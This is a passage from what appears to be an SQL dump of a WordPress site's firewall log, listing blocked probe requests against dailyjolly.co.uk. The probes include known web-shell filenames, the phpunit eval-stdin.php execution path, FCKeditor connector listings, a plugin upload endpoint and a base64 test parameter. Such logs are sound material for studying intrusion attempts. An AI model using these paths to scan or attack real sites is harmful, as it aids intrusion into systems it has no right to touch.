Safari\\/537.36\"}','oYQ1weWUDR9g6zljurSdsBHx',0,1673486574.1067,171,'','GET',403,0,700,0,1,'',0),('159.89.88.144',2673432720,'','https://www.dailyjolly.co.uk/wp-content/themes/twentythree/inc/index.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/84.0.4147.125 Safari\\/537.36\"}','dJ7cnC0igKIjlNup5mUEaFvf',0,1673486574.6129,170,'','GET',403,0,700,0,1,'',0),('159.89.88.144',2673432720,'','https://www.dailyjolly.co.uk/wp-content/themes/classic/inc/index.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/84.0.4147.125 Safari\\/537.36\"}','TnrGgM0lYda54LFp6uvQCN1x',0,1673486575.0772,183,'','GET',403,0,700,0,1,'',0),('125.65.228.200',2101470408,'','https://www.dailyjolly.co.uk/ewebeditor/login_admin.asp','','{\"1\":\"Mozilla\\/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident\\/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)\",\"2\":\"http:\\/\\/www.dailyjolly.co.uk\\/ewebeditor\\/login_admin.asp\"}','T0j6clDkds9pwI1QEXg4eFK8',0,1673494197.7773,502,'','GET',403,0,700,0,1,'',0),('20.241.59.93',351353693,'','https://dailyjolly.co.uk/wp-content/plugins/dzs-zoomsounds/savepng.php?location=1877.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','PzE3vGklCb4tF9JVmiW7XuIU',0,1673494948.6506,625,'','GET',403,0,700,0,1,'',0),('20.241.59.93',351353693,'','https://dailyjolly.co.uk/wp-plain.php','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 7.0; SM-G892A Bulid\\/NRD90M; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/60.0.3112.107 Moblie Safari\\/537.36\",\"2\":\"www.google.com\"}','lVhgzxWka2PO7LZwvpqSornJ',0,1673494948.7539,586,'','POST',403,0,700,0,1,'',0),('20.241.59.93',351353693,'','https://dailyjolly.co.uk/fhevfsvq.php?Fox=d3wL7','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 7.0; SM-G892A Bulid\\/NRD90M; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/60.0.3112.107 Moblie Safari\\/537.36\",\"2\":\"www.google.com\"}','TZktaUYMhcmKs1NGq4OzRCQV',0,1673494949.4780,259,'','GET',403,0,700,0,1,'',0),('3.71.42.211',54995667,'','https://dailyjolly.co.uk/wp/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/79.0.3945.79 Safari\\/537.36\"}','SK9gukRNvyUpo1bOs0wJM853',0,1673515388.1345,270,'','HEAD',403,0,700,0,1,'',0),('3.71.42.211',54995667,'','https://dailyjolly.co.uk/wordpress/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Linux x86_64; rv:79.0) Gecko\\/20100101 Firefox\\/79.0\"}','zbp6xUIW5EOrD0YJasPMeyCu',0,1673515427.6118,225,'','HEAD',403,0,700,0,1,'',0),('3.71.42.211',54995667,'','https://dailyjolly.co.uk/old/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:71.0) Gecko\\/20100101 Firefox\\/71.0\"}','rNRZXMzvFW4On7PDSiJ6ja5H',0,1673515464.0949,213,'','HEAD',403,0,700,0,1,'',0),('3.71.42.211',54995667,'','https://dailyjolly.co.uk/new/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/80.0.3987.149 Safari\\/537.36\"}','jvLUFM0G3yHOKCYEw7TPSX8z',0,1673515501.1126,212,'','HEAD',403,0,700,0,1,'',0),('3.71.42.211',54995667,'','https://dailyjolly.co.uk/blog/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:74.0) Gecko\\/20100101 Firefox\\/74.0\"}','jGuasp8We0y6OSU1PghVTBH5',0,1673515531.6068,250,'','HEAD',403,0,700,0,1,'',0),('212.192.24.22',3569358870,'','https://www.dailyjolly.co.uk/wp-content/plugins/core-stab/index.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/84.0.4147.125 Safari\\/537.36\"}','uAVzGdnWvqm8UH2tZxf0T9Mh',0,1673557771.1313,175,'','GET',403,0,700,0,1,'',0),('212.192.24.22',3569358870,'','https://www.dailyjolly.co.uk/wp-admin/wp-admin.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/84.0.4147.125 Safari\\/537.36\"}','tSUKau89vmrgnCsHQ4T0ix3X',0,1673557771.5012,194,'','GET',403,0,700,0,1,'',0),('212.192.24.22',3569358870,'','https://www.dailyjolly.co.uk/wp-admin.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/84.0.4147.125 Safari\\/537.36\"}','Dd8vZPtmqi0VfouyIgcJ4bhC',0,1673557771.9281,173,'','GET',403,0,700,0,1,'',0),('212.192.24.22',3569358870,'','https://www.dailyjolly.co.uk/wp-content/wp-content.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/84.0.4147.125 Safari\\/537.36\"}','b83sAeMNjOp6QRK10ISvVqEo',0,1673557772.3713,179,'','GET',403,0,700,0,1,'',0),('161.97.158.118',2707529334,'','https://www.dailyjolly.co.uk/wp-content/plugins/core-stab/index.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/84.0.4147.125 Safari\\/537.36\"}','Z34Lsw9Pibn0KXk6xNMtlo8g',0,1673557772.7868,192,'','GET',403,0,700,0,1,'',0),('212.192.24.22',3569358870,'','https://www.dailyjolly.co.uk/wp-includes/wp-includes.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/84.0.4147.125 Safari\\/537.36\"}','RmBq7OFUMhJfNZz5d1Yle9a0',0,1673557772.9675,187,'','GET',403,0,700,0,1,'',0),('212.192.24.22',3569358870,'','https://www.dailyjolly.co.uk/123.php?1=dmFyX2R1bXAoIjg1NjQ1dzQiKTs=','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/84.0.4147.125 Safari\\/537.36\"}','jmNz7DlVrUcB2e3wYGbRWTnO',0,1673557773.3630,181,'','GET',403,0,700,0,1,'',0),('161.97.158.118',2707529334,'','https://www.dailyjolly.co.uk/wp-admin/wp-admin.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/84.0.4147.125 Safari\\/537.36\"}','DzflpGQ7NEUPsB0H9vFZcY3h',0,1673557773.4025,184,'','GET',403,0,700,0,1,'',0),('212.192.24.22',3569358870,'','https://www.dailyjolly.co.uk/wp-admin/js/widgets/index.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/84.0.4147.125 Safari\\/537.36\"}','4hDGmwtoNMiuyjILUz0fbElZ',0,1673557774.0763,171,'','GET',403,0,700,0,1,'',0),('212.192.24.22',3569358870,'','https://www.dailyjolly.co.uk/nf_tracking.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/84.0.4147.125 Safari\\/537.36\"}','q7s31VgQ5PUytwno9EbC6kvN',0,1673557774.4366,183,'','GET',403,0,700,0,1,'',0),('212.192.24.22',3569358870,'','https://www.dailyjolly.co.uk/nin.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/84.0.4147.125 Safari\\/537.36\"}','omKazubUci2X6PRByMsd3Srp',0,1673557774.8472,180,'','GET',403,0,700,0,1,'',0),('161.97.158.118',2707529334,'','https://www.dailyjolly.co.uk/wp-admin.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/84.0.4147.125 Safari\\/537.36\"}','e3XzKq2pVjZbfg1hRnG5CvBF',0,1673557775.1011,181,'','GET',403,0,700,0,1,'',0),('212.192.24.22',3569358870,'','https://www.dailyjolly.co.uk/wp-admin/css/colors/blue/nin.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/84.0.4147.125 Safari\\/537.36\"}','b6rTQgjRfoZ24U3GYsBxXiMN',0,1673557775.2327,184,'','GET',403,0,700,0,1,'',0),('212.192.24.22',3569358870,'','https://www.dailyjolly.co.uk/wp-content/plugins/wp-light/wp-light.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/84.0.4147.125 Safari\\/537.36\"}','OpVyJDdiCMBAP4qIEFcs82R9',0,1673557776.9353,171,'','GET',403,0,700,0,1,'',0),('212.192.24.22',3569358870,'','https://www.dailyjolly.co.uk/wp-content/plugins/networker/networker.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/84.0.4147.125 Safari\\/537.36\"}','TnlkwXQjrupLDC6aYfE874NM',0,1673557777.2968,181,'','GET',403,0,700,0,1,'',0),('212.192.24.22',3569358870,'','https://www.dailyjolly.co.uk/wp-content/themes/twentythree/inc/index.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/84.0.4147.125 Safari\\/537.36\"}','bTBVFMRnc0vpwxdlJWDQCIg1',0,1673557777.6717,281,'','GET',403,0,700,0,1,'',0),('212.192.24.22',3569358870,'','https://www.dailyjolly.co.uk/wp-content/themes/classic/inc/index.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/84.0.4147.125 Safari\\/537.36\"}','6g8mHU3vXBe2hW4EMNRYlTGb',0,1673557778.5021,191,'','GET',403,0,700,0,1,'',0),('161.97.158.118',2707529334,'','https://www.dailyjolly.co.uk/wp-content/wp-content.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/84.0.4147.125 Safari\\/537.36\"}','Hj2Zm4xQYArzM0sLw5KtESUy',0,1673557778.6260,164,'','GET',403,0,700,0,1,'',0),('161.97.158.118',2707529334,'','https://www.dailyjolly.co.uk/wp-includes/wp-includes.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/84.0.4147.125 Safari\\/537.36\"}','NsrQBSJZbpidtKqFaV2xnvA7',0,1673557779.4070,190,'','GET',403,0,700,0,1,'',0),('161.97.158.118',2707529334,'','https://www.dailyjolly.co.uk/123.php?1=dmFyX2R1bXAoIjg1NjQ1dzQiKTs=','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/84.0.4147.125 Safari\\/537.36\"}','uRmGnPvJ9VoXLDdBzEjyx5CA',0,1673557781.3142,172,'','GET',403,0,700,0,1,'',0),('161.97.158.118',2707529334,'','https://www.dailyjolly.co.uk/wp-admin/js/widgets/index.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/84.0.4147.125 Safari\\/537.36\"}','rfzuC7jQv1pBP3aNtEVyoLRG',0,1673557781.7228,189,'','GET',403,0,700,0,1,'',0),('161.97.158.118',2707529334,'','https://www.dailyjolly.co.uk/nf_tracking.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/84.0.4147.125 Safari\\/537.36\"}','kt0JvH9NgyfV3EiwblOMxp27',0,1673557783.0570,165,'','GET',403,0,700,0,1,'',0),('161.97.158.118',2707529334,'','https://www.dailyjolly.co.uk/nin.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/84.0.4147.125 Safari\\/537.36\"}','lFeKxZXr80HzgMWdYjL5atAy',0,1673557784.7333,219,'','GET',403,0,700,0,1,'',0),('161.97.158.118',2707529334,'','https://www.dailyjolly.co.uk/wp-admin/css/colors/blue/nin.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/84.0.4147.125 Safari\\/537.36\"}','wLJB3QMnPXZzDbq5pUitsy10',0,1673557786.1590,204,'','GET',403,0,700,0,1,'',0),('161.97.158.118',2707529334,'','https://www.dailyjolly.co.uk/wp-content/plugins/wp-light/wp-light.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/84.0.4147.125 Safari\\/537.36\"}','P2vhVoWEukbC4IrKitS3DlY7',0,1673557792.0907,189,'','GET',403,0,700,0,1,'',0),('161.97.158.118',2707529334,'','https://www.dailyjolly.co.uk/wp-content/plugins/networker/networker.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/84.0.4147.125 Safari\\/537.36\"}','P8tEIBm0LDiv4k5xYnujFlar',0,1673557792.4567,187,'','GET',403,0,700,0,1,'',0),('161.97.158.118',2707529334,'','https://www.dailyjolly.co.uk/wp-content/themes/twentythree/inc/index.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/84.0.4147.125 Safari\\/537.36\"}','WL87wb1kVpIrNBhcTz9mZygl',0,1673557793.8702,248,'','GET',403,0,700,0,1,'',0),('161.97.158.118',2707529334,'','https://www.dailyjolly.co.uk/wp-content/themes/classic/inc/index.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/84.0.4147.125 Safari\\/537.36\"}','bWlEhGr67wtULsF8Qz1fPJvp',0,1673557795.5779,187,'','GET',403,0,700,0,1,'',0),('216.131.104.16',3632490512,'','https://www.dailyjolly.co.uk/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php','','{\"1\":\"python-requests\\/2.28.1\"}','7aeD9X0LH4IwkrzWQM2hpRf5',0,1673559288.5329,189,'','GET',403,0,700,0,1,'',0),('20.241.59.93',351353693,'','https://dailyjolly.co.uk/wp-plain.php','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 7.0; SM-G892A Bulid\\/NRD90M; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/60.0.3112.107 Moblie Safari\\/537.36\",\"2\":\"www.google.com\"}','oLWhDP5lFZmvINqT1UKHzVwA',0,1673579102.2529,8056,'','POST',403,0,700,0,1,'',0),('20.241.59.93',351353693,'','https://dailyjolly.co.uk/zopliamn.php?Fox=d3wL7','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 7.0; SM-G892A Bulid\\/NRD90M; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/60.0.3112.107 Moblie Safari\\/537.36\",\"2\":\"www.google.com\"}','SLw5skCAVgoyuba6JfKiT0me',0,1673579107.4408,2869,'','GET',403,0,700,0,1,'',0),('216.131.104.15',3632490511,'','https://www.dailyjolly.co.uk/1index.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"www.bing.com\"}','RQ3fi9WzO6khosqEPHNjFB0T',0,1673612595.1750,193,'','GET',403,0,700,0,1,'',0),('216.131.104.15',3632490511,'','https://www.dailyjolly.co.uk/wp_wrong_datlib.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"www.bing.com\"}','K2XzvAW673JSUwQy8sgG1Bhu',0,1673612667.4073,193,'','GET',403,0,700,0,1,'',0),('216.131.104.15',3632490511,'','https://www.dailyjolly.co.uk/beence.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"www.bing.com\"}','XdxvDcuiGkUMNOBT9nYrZe8E',0,1673612669.1879,175,'','GET',403,0,700,0,1,'',0),('216.131.104.15',3632490511,'','https://www.dailyjolly.co.uk/export.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"www.bing.com\"}','ZH7qmSPsBGCtwnEOcI1zF9Lx',0,1673612674.2940,197,'','GET',403,0,700,0,1,'',0),('216.131.104.15',3632490511,'','https://www.dailyjolly.co.uk/wp-content/export.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"www.bing.com\"}','MpwZzgLYfW4O1uo9cJINneqG',0,1673612674.8964,202,'','GET',403,0,700,0,1,'',0),('216.131.104.15',3632490511,'','https://www.dailyjolly.co.uk/wp-includes/wp-atom.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"www.bing.com\"}','OQArqRZ6CEYfvJcldWtT19z4',0,1673612677.8650,197,'','GET',403,0,700,0,1,'',0),('216.131.104.15',3632490511,'','https://www.dailyjolly.co.uk/wp-includes/images/css.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"www.bing.com\"}','kF2gIai0ULNcB4xlnzDpH7EX',0,1673612679.2516,182,'','GET',403,0,700,0,1,'',0),('216.131.104.15',3632490511,'','https://www.dailyjolly.co.uk/wp-includes/css/css.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"www.bing.com\"}','ATIaRub8PZhYesrQip3zW7d0',0,1673612679.8297,190,'','GET',403,0,700,0,1,'',0),('216.131.104.15',3632490511,'','https://www.dailyjolly.co.uk/defau1t.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"www.bing.com\"}','vtmdQkHgpONlwRL9F8VYno31',0,1673612681.0749,182,'','GET',403,0,700,0,1,'',0),('216.131.104.15',3632490511,'','https://www.dailyjolly.co.uk/moduless.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"www.bing.com\"}','ZF51YNP8Iriqg4O3nUWeR0Ql',0,1673612682.6882,173,'','GET',403,0,700,0,1,'',0),('216.131.104.15',3632490511,'','https://www.dailyjolly.co.uk/wp-content/plugins/wpconfig.bak.php?act=sf','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"www.bing.com\"}','9jDWVJQc8fzPXqKI5U07asil',0,1673612794.5940,211,'','GET',403,0,700,0,1,'',0),('216.131.104.15',3632490511,'','https://www.dailyjolly.co.uk/archives.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"www.bing.com\"}','ndOFiUckNbIHBh1s86xvKVGz',0,1673612846.0682,199,'','GET',403,0,700,0,1,'',0),('216.131.104.16',3632490512,'','https://www.dailyjolly.co.uk/defau11.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"www.bing.com\"}','ZpSPg9jr36HRlGTo5hfOBtM7',0,1673612847.6773,191,'','GET',403,0,700,0,1,'',0),('185.36.81.21',3106165013,'','https://dailyjolly.co.uk/js/FCKeditor/editor/filemanager/browser/default/connectors/php/connector.php?Command=GetFoldersAndFiles&Type=File&CurrentFolder=','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/75.0.3770.100 Safari\\/537.36\"}','5C8G4McJXE21biHDmP7odKWk',0,1673616498.6094,270,'','GET',403,0,700,0,1,'',0),('13.56.237.36',221834532,'','https://www.dailyjolly.co.uk/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php','','{\"1\":\"python-requests\\/2.26.0\"}','Fot42qbXG1hMycjxegY3K6il',0,1673623363.7955,211,'','GET',403,0,700,0,1,'',0),('13.56.237.36',221834532,'','https://dailyjolly.co.uk/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php','','{\"1\":\"python-requests\\/2.26.0\"}','Y3pritG14zyaKlgbes6QUmT5',0,1673633565.2137,217,'','GET',403,0,700,0,1,'',0),('136.144.179.119',2291184503,'','https://dailyjolly.co.uk/wp-commentin.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:88.0) Gecko\\/20100101 Firefox\\/88.0\"}','MGVN5ey6zklAtCvsPuTabQUX',0,1673641948.9594,202,'','GET',403,0,700,0,1,'',0),('109.248.175.147',1845014419,'','https://www.dailyjolly.co.uk/wp-content/themes/aidreform/include/lang_upload.php','','{\"1\":\"Mozilla\\/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)\"}','2fUz1QVTF3E0oui9kNKeqs6r',0,1673645517.4124,244,'','GET',403,0,700,0,1,'',0),('109.248.175.147',1845014419,'','https://www.dailyjolly.co.uk/wp-content/themes/kingclub-theme/include/lang_upload.php','','{\"1\":\"Mozilla\\/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)\"}','HyzuekOdUAjZptEqlw9RS7n1',0,1673675565.1868,196,'','GET',403,0,700,0,1,'',0),('168.100.162.235',2825167595,'','https://dailyjolly.co.uk/wp-content/themes/seotheme/db.php?u','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/dailyjolly.co.uk\\/\\/wp-content\\/themes\\/seotheme\\/db.php?u\"}','m0d9sgLxlJIDft7Vh25CB84S',0,1673695102.7200,433,'','GET',403,0,700,0,1,'',0),('168.100.162.235',2825167595,'','https://dailyjolly.co.uk/wp-content/plugins/seoplugins/mar.php','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/dailyjolly.co.uk\\/\\/wp-content\\/plugins\\/seoplugins\\/mar.php\"}','TD3976xHsUKObcE4wnMml8gz',0,1673695103.4207,181,'','GET',403,0,700,0,1,'',0),('168.100.162.235',2825167595,'','https://dailyjolly.co.uk/wp-content/themes/seotheme/mar.php','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/dailyjolly.co.uk\\/\\/wp-content\\/themes\\/seotheme\\/mar.php\"}','8r5jwdzWviBlKbuy7asH3GPD',0,1673695103.8246,193,'','GET',403,0,700,0,1,'',0),('185.36.81.21',3106165013,'','https://dailyjolly.co.uk/js/fckeditor/editor/filemanager/browser/default/connectors/php/connector.php?Command=GetFoldersAndFiles&Type=File&CurrentFolder=','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/75.0.3770.100 Safari\\/537.36\"}','g35Wy8hIubsMJ6mD7cTQLSVZ',0,1673697959.4251,206,'','GET',403,0,700,0,1,'',0),('51.222.112.213',870215893,'','https://dailyjolly.co.uk/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php','','{\"1\":\"python-requests\\/2.28.1\"}','PfComZk4WGuK817XgLlaOFrM',0,1673703971.5407,187,'','GET',403,0,700,0,1,'',0),('88.214.26.8',1490426376,'','https://www.dailyjolly.co.uk/1index.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"www.bing.com\"}','tPkycol5C1TabSdivZ0pHjXJ',0,1673717834.2970,219,'','GET',403,0,700,0,1,'',0),('88.214.26.8',1490426376,'','https://www.dailyjolly.co.uk/3index.php?f=/NmRtJOUjAdutReQj/scRjKUhleBpzmTyO.txt','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"www.bing.com\"}','khupvHBN90aPGgdRJ42K8rMj',0,1673717836.3106,211,'','GET',403,0,700,0,1,'',0),('88.214.26.8',1490426376,'','https://www.dailyjolly.co.uk/wikindex.php?f=/NmRtJOUjAdutReQj/scRjKUhleBpzmTyO.txt','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"www.bing.com\"}','FLUlvj5YCSecGHBzMgqkdZo8',0,1673717840.5610,198,'','GET',403,0,700,0,1,'',0),('88.214.26.8',1490426376,'','https://www.dailyjolly.co.uk/wp-content/mu-plugins-old/index.php?f=/NmRtJOUjAdutReQj/scRjKUhleBpzmTyO.txt','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"www.bing.com\"}','SKIoHAdP2UViug6QzwkBm10y',0,1673717841.7118,191,'','GET',403,0,700,0,1,'',0),('88.214.26.8',1490426376,'','https://www.dailyjolly.co.uk/wp_wrong_datlib.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"www.bing.com\"}','MuDzmhRQCneykpPtHWxE6JKV',0,1673717870.2193,189,'','GET',403,0,700,0,1,'',0),('88.214.26.8',1490426376,'','https://www.dailyjolly.co.uk/beence.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"www.bing.com\"}','6OiVCuZmR2z5Ew4jI7F9xBPY',0,1673717882.4507,213,'','GET',403,0,700,0,1,'',0),('88.214.26.8',1490426376,'','https://www.dailyjolly.co.uk/export.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"www.bing.com\"}','9Eh7XyWZOuYbcRL2TnVUNt1K',0,1673717890.3649,182,'','GET',403,0,700,0,1,'',0),('88.214.26.8',1490426376,'','https://www.dailyjolly.co.uk/wp-content/export.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"www.bing.com\"}','6gz9A8UlaTLyCJXhoiuspDZ0',0,1673717890.5910,188,'','GET',403,0,700,0,1,'',0),('88.214.26.8',1490426376,'','https://www.dailyjolly.co.uk/wp-includes/wp-atom.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 